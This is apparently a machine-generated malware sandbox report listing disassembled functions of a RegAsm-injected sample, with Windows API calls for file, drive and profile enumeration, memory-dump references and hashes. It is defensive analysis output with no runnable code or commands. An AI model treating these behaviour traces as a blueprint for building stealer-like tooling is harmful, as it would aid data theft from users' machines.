Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID: O<B
API String ID: 1699248803-1873169068
Opcode ID: 8cf3e5411f5412c3d29d0bc09b79c54d7594f1da92bb46549c9b8e78b8a74386
Instruction ID: 45e6c66cee0d393bbb3ccfbecb5adc22dc475a6df9d0c134277c29a1610a0002
Opcode Fuzzy Hash: 8cf3e5411f5412c3d29d0bc09b79c54d7594f1da92bb46549c9b8e78b8a74386
Instruction Fuzzy Hash: 22F01CB590014CABDB11DF64C8909EDB7FDEBC8700F10C5AAA90593280D6309F469B50

Uniqueness

Uniqueness Score: -1.00%

Function 19850531 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

failed memory resize %u to %u bytes, xrefs: 19850558

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: failed memory resize %u to %u bytes
API String ID: 0-2134078882
Opcode ID: 013405a90d9c1c101959d51affe6ac69b5a30b0c04e1acf3a669d5ecc46b0fda
Instruction ID: 57f863c68dba2d814fffe90240626780ab2fcf9cda856e53b87cfa571cac23fa
Opcode Fuzzy Hash: 013405a90d9c1c101959d51affe6ac69b5a30b0c04e1acf3a669d5ecc46b0fda
Instruction Fuzzy Hash: 6CD02BB6D0C1207FD7012B58EC0198A77519B50531F8CC52CFC5C15250D2329DA4D3D3

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF86 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EF97

Strings

Unknown, xrefs: 0040EFAA

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 6a5c29231768e02ec54d7e71c5f3ded4356e949e652b53887adf4e8dc1d825f2
Instruction ID: dcaad79bc021bc7f3acda73ba1a55b24e0372051eba70068b5ae00655755aee4
Opcode Fuzzy Hash: 6a5c29231768e02ec54d7e71c5f3ded4356e949e652b53887adf4e8dc1d825f2
Instruction Fuzzy Hash: 76E0EC71A0010AEBDB10DBA6E845FA977ACAB04348F54846AF801A7281DA78D519DB69

Uniqueness

Uniqueness Score: -1.00%

Function 198504D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 198504E7

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: cbceb9a7da2e4e61cbcfc2c883362ff9328dc56e9a90943f0233ac4e995e9e9b
Instruction ID: 208136dc43d40ce3e9ac494656025859e9e98160dc9e786f7e47e1f2ec2cc232
Opcode Fuzzy Hash: cbceb9a7da2e4e61cbcfc2c883362ff9328dc56e9a90943f0233ac4e995e9e9b
Instruction Fuzzy Hash: 84D01266D8C23263D6111698FC05ECB7D515FA09A1F8D803CFD4C59360D555ADD5C3D2

Uniqueness

Uniqueness Score: -1.00%

Function 0040F75F Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F764
GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFileH_prolog
String ID:
API String ID: 3244726999-0
Opcode ID: 6f00de53327e1575e3fd9b3adeca56bb0ef3e21a75ba924ab05cb97eefee5d2f
Instruction ID: bf31c61f93718621c586fb5ee84d7f60d8da8a4487b707c6ecbf40584ea00f83
Opcode Fuzzy Hash: 6f00de53327e1575e3fd9b3adeca56bb0ef3e21a75ba924ab05cb97eefee5d2f
Instruction Fuzzy Hash: 88E09271900514ABCB14EFA9D8411DD7720EF057A4F50CA3FFC22B36D0DB389A068689

Uniqueness

Uniqueness Score: -1.00%

Function 00405A30 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E32,00000000,00000000), ref: 00405A8F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E32,00000000,00000000), ref: 00405ABB

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 13952f3c5282676e9fff2e4139e34abb68a3afbd7b4b0673f58908b5c203bd9e
Instruction ID: e70a3417a4082e47c5cc675eccf9baa03e5a1765de93523d1ed94c5c1dee212e
Opcode Fuzzy Hash: 13952f3c5282676e9fff2e4139e34abb68a3afbd7b4b0673f58908b5c203bd9e
Instruction Fuzzy Hash: C1218E71700B059BC724CFB4CD85BABB7F5EB40714F24492AE51AE7290D279AD40CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA5F Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CA64

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0040B8F5: _EH_prolog.MSVCRT ref: 0040B8FA
Part of subcall function 0040B8F5: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B94D
Part of subcall function 0040B8F5: memcmp.MSVCRT ref: 0040B98B

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
String ID:
API String ID: 2375657845-0
Opcode ID: d9a798d28cd2138f77fc422e80fc9cc8b495af648d1b15e7bf36eb69f3db8c61
Instruction ID: 309d288b9ccc134c4f2c4fad64900418b064d3a2b89e9a0470d2305c40c458cb
Opcode Fuzzy Hash: d9a798d28cd2138f77fc422e80fc9cc8b495af648d1b15e7bf36eb69f3db8c61
Instruction Fuzzy Hash: 5D915371C04248EADF01EBE6C946ADEBFB8AF15304F14456EE805732C2DB786718C766

Uniqueness

Uniqueness Score: -1.00%

Function 004022CC Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00402351

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 290ae97613b584264aaae71415ed981ecc71420f11d979129dbabea7d3cc78a8
Instruction ID: 2328445efe7ab2f58eb15f40147bb64acd6b7df007c89a747e70fe0b03bcf46e
Opcode Fuzzy Hash: 290ae97613b584264aaae71415ed981ecc71420f11d979129dbabea7d3cc78a8
Instruction Fuzzy Hash: 624112715002299FCB11CF69D8806ED7BB1FF89318F1484BADD55EB391D2786E82CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE6 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51cafca5650e2118d254ae9eefb3e2f5288941b44b5279c34b8c0c76604affb9
Instruction ID: bebd83ccdab7e7645d1c2bd5a0387410984b3a34777dd0c5b6702729d22ebb59
Opcode Fuzzy Hash: 51cafca5650e2118d254ae9eefb3e2f5288941b44b5279c34b8c0c76604affb9
Instruction Fuzzy Hash: 65414571A0060AAFCF24AF94C9809AFBBB1EB44314F10447FE915B73D1D6389A408F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A722 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A727

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00409E01: _EH_prolog.MSVCRT ref: 00409E06
Part of subcall function 00409E01: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00423BDE,00000000,?,00000000), ref: 00409E85

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirstlstrcpy
String ID:
API String ID: 1592259726-0
Opcode ID: 4e71af54d5813ddebd9f29d7ed5489b9703fd0989b69de78ef60b942adbe8713
Instruction ID: db99cc98b8764f51ea57ff4030619b47d686214260cc602a4e861b125f3ab18f
Opcode Fuzzy Hash: 4e71af54d5813ddebd9f29d7ed5489b9703fd0989b69de78ef60b942adbe8713
Instruction Fuzzy Hash: 96216171900248EACF11EFAAC9067DDBFB4AF05304F00456EE88473282D7795718C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00401E78 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401E7D

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 004011D9: _EH_prolog.MSVCRT ref: 004011DE
Part of subcall function 004011D9: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042037C,?,?,?,00420378,?,?,00000000,?,00000000), ref: 00401423

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirstlstrcpy
String ID:
API String ID: 1592259726-0
Opcode ID: e1d64b6843ccd50feaeed3f14da3e32ea13c0b94452bc713152aaf92b6e6ebba
Instruction ID: d1f4cdd05422496ba4789598eabb82facaa0504cf6f71ca0dc1c7c41109528fd
Opcode Fuzzy Hash: e1d64b6843ccd50feaeed3f14da3e32ea13c0b94452bc713152aaf92b6e6ebba
Instruction Fuzzy Hash: 1B219F71D00208ABDF10EFAAC90769CBFB4AF45314F00442EE85463292D7795758CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 198232E7 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 199FF077

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8654bcf502aee92cd9707861456025348cfd6ed3d785b6744f8ce1add7882e13
Instruction ID: bd1490d2599f812494635922f11e4e63b03cf5f57a4175756e0e54879696fe6b
Opcode Fuzzy Hash: 8654bcf502aee92cd9707861456025348cfd6ed3d785b6744f8ce1add7882e13
Instruction Fuzzy Hash: EDF0C23764151AABC7221E2D9C00B5AAF5C8F81AB1B2DC12EE858A61C0DE64A44593E0

Uniqueness

Uniqueness Score: -1.00%

Function 00414534 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414539

Part of subcall function 0041179F: _EH_prolog.MSVCRT ref: 004117A4

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0041433D: _EH_prolog.MSVCRT ref: 00414342
Part of subcall function 0041433D: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004143A4
Part of subcall function 0041433D: memset.MSVCRT ref: 004143C3
Part of subcall function 0041433D: GetDriveTypeA.KERNEL32(?), ref: 004143CC
Part of subcall function 0041433D: lstrcpy.KERNEL32(?,00000000), ref: 004143EC
Part of subcall function 0041433D: lstrcpy.KERNEL32(?,00000000), ref: 0041442D
Part of subcall function 0041433D: lstrlen.KERNEL32(?), ref: 00414492

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
String ID:
API String ID: 373919974-0
Opcode ID: ec370033ae36458cbea9b5d2a7f5a1d78cb146b488f4ff8cbebb0cd2c248791d
Instruction ID: 88c751316bf3e4fc80c263676f57d0e70ec488c72ca2e5da4737ae576ed00ee1
Opcode Fuzzy Hash: ec370033ae36458cbea9b5d2a7f5a1d78cb146b488f4ff8cbebb0cd2c248791d
Instruction Fuzzy Hash: 1401D231800258EBCF10EF69C9427EEBBB5FF41354F10411AE8A563281D7385B89C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCD2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 0040FD0B

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 3c595071a4135b8031b85ad395c977ac7bee5dc4871b64421426ef5372fe9827
Instruction ID: 01fbf191d4210276dad4f55db658cef1fc33debfcdc509269fbf75e6b50e343d
Opcode Fuzzy Hash: 3c595071a4135b8031b85ad395c977ac7bee5dc4871b64421426ef5372fe9827
Instruction Fuzzy Hash: CCE0C2B0E0021D9FCB40DFE4E4452EEBBF4EF48308F40802AC409E7240E37442058BA9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00414960 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 134stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414965
GetProcessHeap.KERNEL32(00000000,0098967F,00000104), ref: 0041497C
HeapAlloc.KERNEL32(00000000), ref: 00414983
wsprintfA.USER32 ref: 0041499B
FindFirstFileA.KERNEL32(?,?), ref: 004149B2
StrCmpCA.SHLWAPI(?,00424800), ref: 004149CF
StrCmpCA.SHLWAPI(?,00424804), ref: 004149E5
wsprintfA.USER32 ref: 00414A05

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00411814: _EH_prolog.MSVCRT ref: 00411819
Part of subcall function 00411814: memset.MSVCRT ref: 0041183A
Part of subcall function 00411814: memset.MSVCRT ref: 00411848
Part of subcall function 00411814: lstrcat.KERNEL32(?,00000000), ref: 00411874
Part of subcall function 00411814: lstrcat.KERNEL32(?), ref: 00411892
Part of subcall function 00411814: lstrcat.KERNEL32(?,?), ref: 004118A6
Part of subcall function 00411814: lstrcat.KERNEL32(?), ref: 004118B9
Part of subcall function 00411814: StrStrA.SHLWAPI(00000000), ref: 00411953

FindNextFileA.KERNEL32(00000000,?), ref: 00414A5C
FindClose.KERNEL32(00000000), ref: 00414A6B
lstrcat.KERNEL32(?,?), ref: 00414A90
lstrcat.KERNEL32(?), ref: 00414AA3
lstrlen.KERNEL32(?), ref: 00414AAC
lstrlen.KERNEL32(?), ref: 00414AB9

Strings

%s\%s, xrefs: 004149FF
%s\*, xrefs: 00414995

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

